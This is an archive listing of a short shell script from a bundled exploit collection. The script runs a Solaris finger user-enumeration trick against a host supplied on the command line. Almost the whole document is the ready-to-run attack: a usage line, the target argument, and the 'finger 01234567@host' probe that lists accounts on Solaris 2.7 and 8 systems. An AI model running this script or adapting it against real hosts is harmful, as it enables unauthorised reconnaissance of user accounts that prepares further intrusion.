home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / system / solaris / local / fng.sh < prev    next >
Linux/UNIX/POSIX Shell Script  |  2005-02-12  |  380b  |  13 lines

  1. #!/bin/sh
  2. #
  3. # If you use digits  as username, Solaris "finger" will list
  4. # the users who have not configured full name in /etc/passwd.
  5. #
  6. # Affected: solaris 2.7, solaris 8.0
  7. #
  8. # Usage:
  9. #       ./fng.sh <host>
  10. #                                         Found by warning3
  11. echo -n "Targetting: "
  12. finger 01234567@$1
  13. #                www.hack.co.za           [19 April 2001]